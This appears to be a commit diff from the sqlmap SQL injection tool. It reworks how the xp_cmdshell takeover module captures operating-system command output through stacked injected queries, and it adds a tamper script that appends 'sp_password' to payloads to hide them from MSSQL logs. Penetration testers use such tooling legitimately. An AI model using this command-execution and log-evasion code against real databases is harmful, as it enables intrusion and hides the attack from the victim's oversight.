Fix for Issue #62

2024-11-22 01:26:42 +03:00 · 2012-07-06 12:24:55 +02:00 · 2012-07-06 12:24:55 +02:00 · 982fcde1c0
commit 982fcde1c0
parent bc5025b06c
3 changed files with 46 additions and 18 deletions
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@ -69,6 +69,14 @@ class BigArray(list):
            with open(self.chunks[index], "rb") as fp:
                self.cache = Cache(index, pickle.load(fp), False)

+    def __getslice__(self, i, j):
+        retval = BigArray()
+        i = max(0, len(self) + i if i < 0 else i)
+        j = min(len(self), len(self) + j if j < 0 else j)
+        for _ in xrange(i, j):
+            retval.append(self[_])
+        return retval
+
    def __getitem__(self, y):
        index = y / BIGARRAY_CHUNK_LENGTH
        offset = y % BIGARRAY_CHUNK_LENGTH
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@ -9,6 +9,7 @@ from lib.core.agent import agent
 from lib.core.common import Backend
 from lib.core.common import getSPQLSnippet
 from lib.core.common import hashDBWrite
+from lib.core.common import isListLike
 from lib.core.common import isNoneValue
 from lib.core.common import pushValue
 from lib.core.common import popValue
@ -154,8 +155,6 @@ class xp_cmdshell:
        return inject.goStacked(cmd, silent)

    def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
-        self.getRemoteTempPath()
-
        if conf.direct:
            output = self.xpCmdshellExecCmd(cmd)

@ -170,23 +169,11 @@ class xp_cmdshell:

                output = new_output
        else:
-            tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
-            cmd = "%s > \"%s\"" % (cmd, tmpFile)
-
-            self.xpCmdshellExecCmd(cmd)
-
-            inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))
-
-            self.delRemoteFile(tmpFile)
-
-            output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)
+            inject.goStacked("INSERT INTO %s EXEC %s '%s'" % (self.cmdTblName, self.xpCmdshellStr, cmd))
+            output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False)
            inject.goStacked("DELETE FROM %s" % self.cmdTblName)
-
-            if output and isinstance(output, (list, tuple)):
-                output = output[0]
-
-                if output and isinstance(output, (list, tuple)):
-                    output = output[0]
+            if output and isListLike(output):
+                output = output[1:]

        return output

--- a/tamper/sp_password.py
+++ b/tamper/sp_password.py
@ -0,0 +1,33 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGH
+
+def tamper(payload):
+    """
+    Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
+
+    Example:
+        * Input: 1 AND 9227=9227--
+        * Output: 1 AND 9227=9227--sp_password
+
+    Requirement:
+        * MSSQL
+
+    Notes:
+        * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
+        * Reference: http://websec.ca/kb/sql_injection
+    """
+
+    retVal = ""
+
+    if payload:
+        retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "")
+
+    return retVal